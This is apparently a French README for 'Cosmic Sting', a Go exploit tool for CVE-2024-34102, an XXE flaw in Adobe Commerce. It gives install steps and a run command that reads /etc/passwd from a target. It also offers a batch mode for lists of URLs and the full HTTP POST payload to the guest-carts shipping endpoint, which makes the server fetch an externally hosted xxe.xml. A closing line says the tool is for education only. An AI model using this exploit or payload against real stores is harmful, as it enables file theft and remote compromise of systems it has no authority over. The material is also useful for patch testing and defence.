
Exploit basé sur Go pour CVE-2024-34102, une vulnérabilité XXE dans Adobe Commerce permettant une exécution de code à distance. Prend en charge l'analyse d'URL en mode unique et par lots avec lecture de fichiers via SSRF.
Cosmic Sting est un outil basé sur Go conçu pour exploiter CVE-2024-34102, une vulnérabilité d'exécution de code à distance.
Les versions d'Adobe Commerce 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 et antérieures sont affectées par une vulnérabilité de restriction incorrecte des références d'entités externes XML (« XXE ») qui pourrait entraîner l'exécution de code arbitraire. Un attaquant pourrait exploiter cette vulnérabilité en envoyant un document XML conçu qui référence des entités externes. L'exploitation de ce problème ne nécessite pas d'interaction de l'utilisateur.
Clonez le dépôt :
git clone https://github.com/bughuntar/CVE-2024-34102.git &&
cd CVE-2024-34102
Installez les dépendances (le cas échéant) :
go version &&
go mod init cosmic_sting &&
go get github.com/fatih/color &&
go get github.com/google/uuid &&
go get github.com/urfave/cli/v2
Pour exécuter l'outil avec une seule URL :
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"
-u, --url : URL unique à exploiter.-f, --file : Fichier à lire via SSRF.-l, --list : Fichier contenant une liste d'URL à exploiter.POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}
Ce projet n'est pas sous licence, il a été créé uniquement pour un projet personnel.
Les contributions sont les bienvenues ! Veuillez ouvrir une issue ou soumettre une pull request pour toute modification.
Cet outil est destiné uniquement à des fins éducatives. Utilisez-le de manière responsable et uniquement sur des systèmes que vous avez la permission de tester.
Professor the Hunter --> Suivez-moi sur Twitter